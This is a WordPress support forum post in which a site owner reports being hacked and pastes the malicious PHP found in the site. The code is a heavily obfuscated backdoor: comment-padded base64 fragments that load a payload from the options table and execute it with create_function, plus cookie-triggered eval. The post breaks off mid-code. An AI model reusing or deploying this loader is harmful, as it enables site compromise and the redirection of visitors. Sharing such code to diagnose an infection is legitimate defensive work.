WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] I was hacked (42 posts)

  1. patrickdappollonio
    Member
    Posted 5 years ago #

    Hello,

    From the sunday, I've hacked by an unknowed. The hacker add a malicoious script when a visitors arrive from google, the script send them to another search page, with the same string that the user wants to find in Google.

    The hacker add this malicious code to an image of my weblog -an image of a post blog- and the hacker add the image to work like a plugin in the MySQL database.

    Here is the code of the image transformated in plugin:

    <?php /*?#?#,,sess,GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd */global $wpdb;/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd */$trp_rss=$wpdb->get_var/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd */(/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/"SELECT option_value FROM $wpdb->options WHERE option_name='rss_f541b3abd05e7962fcab37737f40fad8'"/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/); /* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/ preg_match/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/(/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/"!events or a cale\"\;s\:7\:\'(.*?)\'!is",$trp_rss,$trp_m/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/);/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/ $trp_f=create_function/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/(/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
